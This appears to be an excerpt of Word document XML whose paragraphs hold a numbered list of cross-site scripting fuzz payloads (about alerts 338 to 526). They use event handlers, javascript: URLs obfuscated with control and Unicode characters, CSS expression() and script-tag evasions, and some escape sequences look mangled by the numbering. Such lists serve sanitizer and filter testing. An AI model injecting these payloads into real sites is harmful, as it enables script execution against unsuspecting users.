    <w:p w14:paraId="2325865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onkeyup body onkeyup="javascript:javascript:alert(338)"&gt;&lt;/body onkeyup&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719F3D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onunload body onunload="javascript:javascript:alert(339)"&gt;&lt;/body onunload&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F9C5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onload iframe onload="javascript:javascript:alert(340)"&gt;&lt;/iframe onload&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1D92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 body onload="javascript:javascript:alert(341)"&gt;&lt;/body onload&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72888E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onmouseover html onmouseover="javascript:javascript:alert(342)"&gt;&lt;/html onmouseover&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD2E2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onbeforeload object onbeforeload="javascript:javascript:alert(343)"&gt;&lt;/object onbeforeload&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64499E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onbeforeunload body onbeforeunload="javascript:javascript:alert(344)"&gt;&lt;/body onbeforeunload&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774225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onfocus body onfocus="javascript:javascript:alert(345)"&gt;&lt;/body onfocus&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB5EBE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onkeydown body onkeydown="javascript:javascript:alert(346)"&gt;&lt;/body onkeydown&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41290C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onbeforeload iframe onbeforeload="javascript:javascript:alert(347)"&gt;&lt;/iframe onbeforeload&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE30A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 iframe src="javascript:javascript:alert(348)"&gt;&lt;/iframe src&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471FD88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 svg onload="javascript:javascript:alert(349)"&gt;&lt;/svg onload&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC304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onmousemove html onmousemove="javascript:javascript:alert(350)"&gt;&lt;/html onmousemove&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739D9C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onblur body onblur="javascript:javascript:alert(351)"&gt;&lt;/body onblur&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00923F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\x3Cscript&gt;javascript:alert(352)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059220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'"`&gt;&lt;script&gt;/* *\x2Fjavascript:alert(353)// */&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5200E6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&lt;script&gt;javascript:alert(354)&lt;/script\x0D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079FA6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&lt;script&gt;javascript:alert(355)&lt;/script\x0A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CBD0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&lt;script&gt;javascript:alert(356)&lt;/script\x0B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFE98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charset="\x22&gt;javascript:alert(357)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551F09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&lt;!--\x3E&lt;img src=xxx:x onerror=javascript:alert(358)&gt; --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CB83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---&gt; &lt;img src=xxx:x onerror=javascript:alert(359)&gt; --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747593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--\x00&gt; &lt;img src=xxx:x onerror=javascript:alert(360)&gt; --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA74F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--\x2361&gt; &lt;img src=xxx:x onerror=javascript:alert(361)&gt; --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7694DF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--\x3E&gt; &lt;img src=xxx:x onerror=javascript:alert(362)&gt; --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48583B9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src='#\x27 onerror=javascript:alert(363)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF1DE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href="javascript\x3Ajavascript:alert(364)" id="fuzzelement364"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EBF0C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"'`&gt;&lt;p&gt;&lt;svg&gt;&lt;script&gt;a='hello\x27;javascript:alert(365)//';&lt;/script&gt;&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8099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href="javas\x00cript:javascript:alert(366)" id="fuzzelement366"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069CC85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href="javas\x07cript:javascript:alert(367)" id="fuzzelement367"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BED6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href="javas\x0Dcript:javascript:alert(368)" id="fuzzelement368"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2D250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href="javas\x0Acript:javascript:alert(369)" id="fuzzelement369"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F202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href="javas\x08cript:javascript:alert(370)" id="fuzzelement370"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4DAF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href="javas\x02cript:javascript:alert(371)" id="fuzzelement371"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B497E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href="javas\x03cript:javascript:alert(372)" id="fuzzelement372"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D961B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href="javas\x04cript:javascript:alert(373)" id="fuzzelement373"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229929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href="javas\x0374cript:javascript:alert(374)" id="fuzzelement374"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C7C0D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href="javas\x05cript:javascript:alert(375)" id="fuzzelement375"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523CF2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href="javas\x0Bcript:javascript:alert(376)" id="fuzzelement376"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073044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href="javas\x09cript:javascript:alert(377)" id="fuzzelement377"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B697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href="javas\x06cript:javascript:alert(378)" id="fuzzelement378"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EF28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href="javas\x0Ccript:javascript:alert(379)" id="fuzzelement379"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F85C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&lt;script&gt;/* *\x2A/javascript:alert(380)// */&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3411AF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&lt;script&gt;/* *\x00/javascript:alert(381)// */&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2574DC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&lt;style&gt;&lt;/style\x3E&lt;img src="about:blank" onerror=javascript:alert(382)//&gt;&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F33CB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&lt;style&gt;&lt;/style\x0D&lt;img src="about:blank" onerror=javascript:alert(383)//&gt;&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511534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&lt;style&gt;&lt;/style\x09&lt;img src="about:blank" onerror=javascript:alert(384)//&gt;&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358BB6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&lt;style&gt;&lt;/style\x20&lt;img src="about:blank" onerror=javascript:alert(385)//&gt;&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD854C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&lt;style&gt;&lt;/style\x0A&lt;img src="about:blank" onerror=javascript:alert(386)//&gt;&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453949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"'`&gt;ABC&lt;div style="font-family:'foo'\x7Dx:expression(javascript:alert(387);/*';"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BB4E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"'`&gt;ABC&lt;div style="font-family:'foo'\x3Bx:expression(javascript:alert(388);/*';"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C702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&lt;script&gt;if("x\\xE389\x96\x89".length==2) { javascript:alert(389);}&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C8B0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&lt;script&gt;if("x\\xE0\xB9\x92".length==2) { javascript:alert(390);}&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181C1D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&lt;script&gt;if("x\\xEE\xA9\x93".length==2) { javascript:alert(391);}&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09940A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'`"&gt;&lt;\x3Cscript&gt;javascript:alert(392)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5B8F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'`"&gt;&lt;\x00script&gt;javascript:alert(393)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468BBB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"'`&gt;&lt;\x3Cimg src=xxx:x onerror=javascript:alert(394)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799A10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"'`&gt;&lt;\x00img src=xxx:x onerror=javascript:alert(395)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267747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src="data:text/plain\x2Cjavascript:alert(396)"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F64D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src="data:\xD4\x8F,javascript:alert(397)"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C10B7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src="data:\xE0\xA4\x98,javascript:alert(398)"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18654E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 src="data:\xCB\x8F,javascript:alert(399)"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018684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&lt;script\x20type="text/javascript"&gt;javascript:alert(400);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2097FE0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&lt;script\x3Etype="text/javascript"&gt;javascript:alert(401);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F9F0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&lt;script\x0Dtype="text/javascript"&gt;javascript:alert(402);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C90D6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&lt;script\x09type="text/javascript"&gt;javascript:alert(403);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B714B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&lt;script\x0Ctype="text/javascript"&gt;javascript:alert(404);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146EC1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&lt;script\x2Ftype="text/javascript"&gt;javascript:alert(405);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78112B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&lt;script\x0Atype="text/javascript"&gt;javascript:alert(406);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B83E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style="x\x3Aexpression(javascript:alert(407)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483397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style="x:expression\x5C(javascript:alert(408)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E38C5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style="x:expression\x00(javascript:alert(409)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630F88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style="x:exp\x00ression(javascript:alert(410)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FFBB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style="x:exp\x5Cression(javascript:alert(411)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC9CD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style="x:\x0Aexpression(javascript:alert(412)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECE85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style="x:\x09expression(javascript:alert(413)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DD15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style="x:\xE3\x80\x80expression(javascript:alert(414)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2384DA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style="x:\xE2\x80\x84expression(javascript:alert(415)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACA6D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style="x:\xC2\xA0expression(javascript:alert(416)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D678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style="x:\xE2\x80\x80expression(javascript:alert(417)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DE58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style="x:\xE2\x80\x8Aexpression(javascript:alert(418)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F276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style="x:\x0Dexpression(javascript:alert(419)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ABCE5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style="x:\x0Cexpression(javascript:alert(420)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1802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style="x:\xE2\x80\x87expression(javascript:alert(421)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A303D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style="x:\xEF\xBB\xBFexpression(javascript:alert(422)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B344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style="x:\x20expression(javascript:alert(423)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1351A1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style="x:\xE2\x80\x88expression(javascript:alert(424)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA7310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style="x:\x00expression(javascript:alert(425)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521038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style="x:\xE2\x80\x8Bexpression(javascript:alert(426)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53659B9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style="x:\xE2\x80\x86expression(javascript:alert(427)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0EDD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style="x:\xE2\x80\x85expression(javascript:alert(428)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615361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style="x:\xE2\x80\x82expression(javascript:alert(429)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C486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style="x:\x0Bexpression(javascript:alert(430)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C78B1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style="x:\xE2\x80\x8431expression(javascript:alert(431)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3884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style="x:\xE2\x80\x83expression(javascript:alert(432)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3506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style="x:\xE2\x80\x89expression(javascript:alert(433)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694732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href="\x0Bjavascript:javascript:alert(434)" id="fuzzelement434"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5B80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href="\x0Fjavascript:javascript:alert(435)" id="fuzzelement435"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305E48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href="\xC2\xA0javascript:javascript:alert(436)" id="fuzzelement436"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C08B8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href="\x05javascript:javascript:alert(437)" id="fuzzelement437"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65886FE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href="\xE438\xA0\x8Ejavascript:javascript:alert(438)" id="fuzzelement438"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3AEE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href="\x4398javascript:javascript:alert(439)" id="fuzzelement439"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E34E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href="\x440440javascript:javascript:alert(440)" id="fuzzelement440"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3F7F3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href="\xE2\x80\x88javascript:javascript:alert(441)" id="fuzzelement441"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0057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href="\xE2\x80\x89javascript:javascript:alert(442)" id="fuzzelement442"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77276A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&lt;a href="\xE2\x80\x80javascript:javascript:alert(443)" id="fuzzelement443"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2FC7F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href="\x4447javascript:javascript:alert(444)" id="fuzzelement444"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A181F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href="\x03javascript:javascript:alert(445)" id="fuzzelement445"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7310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href="\x0Ejavascript:javascript:alert(446)" id="fuzzelement446"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5EE1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href="\x447Ajavascript:javascript:alert(447)" id="fuzzelement447"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120071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href="\x00javascript:javascript:alert(448)" id="fuzzelement448"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3620AE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href="\x4490javascript:javascript:alert(449)" id="fuzzelement449"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED81C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href="\xE2\x80\x82javascript:javascript:alert(450)" id="fuzzelement450"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BD9A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href="\x20javascript:javascript:alert(451)" id="fuzzelement451"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEF3E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href="\x4523javascript:javascript:alert(452)" id="fuzzelement452"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243386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href="\x09javascript:javascript:alert(453)" id="fuzzelement453"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C3411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href="\xE2\x80\x8Ajavascript:javascript:alert(454)" id="fuzzelement454"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A4F4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href="\x4554javascript:javascript:alert(455)" id="fuzzelement455"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5080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href="\x4569javascript:javascript:alert(456)" id="fuzzelement456"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A69AC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href="\xE2\x80\xAFjavascript:javascript:alert(457)" id="fuzzelement457"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FF69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href="\x458Fjavascript:javascript:alert(458)" id="fuzzelement458"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6C34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href="\xE2\x80\x8459javascript:javascript:alert(459)" id="fuzzelement459"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412F12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href="\x460Djavascript:javascript:alert(460)" id="fuzzelement460"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F0C6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href="\xE2\x80\x87javascript:javascript:alert(461)" id="fuzzelement461"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EB6F9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href="\x07javascript:javascript:alert(462)" id="fuzzelement462"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2324BF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href="\xE463\x9A\x80javascript:javascript:alert(463)" id="fuzzelement463"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D4AF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href="\xE2\x80\x83javascript:javascript:alert(464)" id="fuzzelement464"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21684A4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href="\x04javascript:javascript:alert(465)" id="fuzzelement465"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F719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href="\x0466javascript:javascript:alert(466)" id="fuzzelement466"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA3DA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href="\x08javascript:javascript:alert(467)" id="fuzzelement467"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF9B5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href="\xE2\x80\x84javascript:javascript:alert(468)" id="fuzzelement468"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B3E1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href="\xE2\x80\x86javascript:javascript:alert(469)" id="fuzzelement469"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DF307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href="\xE3\x80\x80javascript:javascript:alert(470)" id="fuzzelement470"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1853F35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href="\x4712javascript:javascript:alert(471)" id="fuzzelement471"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AB38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href="\x0Djavascript:javascript:alert(472)" id="fuzzelement472"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB010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href="\x0Ajavascript:javascript:alert(473)" id="fuzzelement473"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336C756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href="\x0Cjavascript:javascript:alert(474)" id="fuzzelement474"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E046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href="\x4755javascript:javascript:alert(475)" id="fuzzelement475"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51075A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href="\xE2\x80\xA8javascript:javascript:alert(476)" id="fuzzelement476"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222C26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href="\x4776javascript:javascript:alert(477)" id="fuzzelement477"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D0EB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href="\x02javascript:javascript:alert(478)" id="fuzzelement478"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D587F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href="\x479Bjavascript:javascript:alert(479)" id="fuzzelement479"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CEFF4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href="\x06javascript:javascript:alert(480)" id="fuzzelement480"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2519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href="\xE2\x80\xA9javascript:javascript:alert(481)" id="fuzzelement481"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73578A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href="\xE2\x80\x85javascript:javascript:alert(482)" id="fuzzelement482"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006EB2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href="\x483Ejavascript:javascript:alert(483)" id="fuzzelement483"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C7D0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href="\xE2\x8484\x9Fjavascript:javascript:alert(484)" id="fuzzelement484"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A36F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href="\x485Cjavascript:javascript:alert(485)" id="fuzzelement485"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF455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href="javascript\x00:javascript:alert(486)" id="fuzzelement486"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517C65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&lt;a href="javascript\x3A:javascript:alert(487)" id="fuzzelement487"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5CEAC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href="javascript\x09:javascript:alert(488)" id="fuzzelement488"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A7110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href="javascript\x0D:javascript:alert(489)" id="fuzzelement489"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B444F3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href="javascript\x0A:javascript:alert(490)" id="fuzzelement490"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469FFAD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\x0Aonerror=javascript:alert(491)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026739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\x22onerror=javascript:alert(492)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D04F9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\x0Bonerror=javascript:alert(493)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EB13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\x0Donerror=javascript:alert(494)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5EBC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\x2Fonerror=javascript:alert(495)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1078F0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\x09onerror=javascript:alert(496)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB896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\x0Conerror=javascript:alert(497)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6666C89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\x00onerror=javascript:alert(498)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102A2D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\x27onerror=javascript:alert(499)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1446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\x20onerror=javascript:alert(500)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD71D5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"`'&gt;&lt;script&gt;\x3Bjavascript:alert(501)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508CD57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"`'&gt;&lt;script&gt;\x0Djavascript:alert(502)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E607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"`'&gt;&lt;script&gt;\xEF\xBB\xBFjavascript:alert(503)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C162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"`'&gt;&lt;script&gt;\xE2\x80\x8504javascript:alert(504)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F421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"`'&gt;&lt;script&gt;\xE2\x80\x84javascript:alert(505)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AC85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"`'&gt;&lt;script&gt;\xE3\x80\x80javascript:alert(506)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168072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"`'&gt;&lt;script&gt;\x09javascript:alert(507)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A4C8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"`'&gt;&lt;script&gt;\xE2\x80\x89javascript:alert(508)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449F28B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"`'&gt;&lt;script&gt;\xE2\x80\x85javascript:alert(509)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E965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"`'&gt;&lt;script&gt;\xE2\x80\x88javascript:alert(510)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE7866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"`'&gt;&lt;script&gt;\x00javascript:alert(511)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791B68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"`'&gt;&lt;script&gt;\xE2\x80\xA8javascript:alert(512)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7A07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"`'&gt;&lt;script&gt;\xE2\x80\x8Ajavascript:alert(513)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037FC8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"`'&gt;&lt;script&gt;\xE514\x9A\x80javascript:alert(514)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583B6C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"`'&gt;&lt;script&gt;\x0Cjavascript:alert(515)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC520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"`'&gt;&lt;script&gt;\x2Bjavascript:alert(516)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776BB8E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"`'&gt;&lt;script&gt;\xF0\x90\x96\x9Ajavascript:alert(517)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA1BE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"`'&gt;&lt;script&gt;-javascript:alert(518)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1058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"`'&gt;&lt;script&gt;\x0Ajavascript:alert(519)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5019CC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"`'&gt;&lt;script&gt;\xE2\x80\xAFjavascript:alert(520)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D10F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"`'&gt;&lt;script&gt;\x7Ejavascript:alert(521)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5749F0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"`'&gt;&lt;script&gt;\xE2\x80\x87javascript:alert(522)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA82D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"`'&gt;&lt;script&gt;\xE2\x8523\x9Fjavascript:alert(523)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D670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"`'&gt;&lt;script&gt;\xE2\x80\xA9javascript:alert(524)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA49B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"`'&gt;&lt;script&gt;\xC2\x85javascript:alert(525)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFCF8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"`'&gt;&lt;script&gt;\xEF\xBF\xAEjavascript:alert(526)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
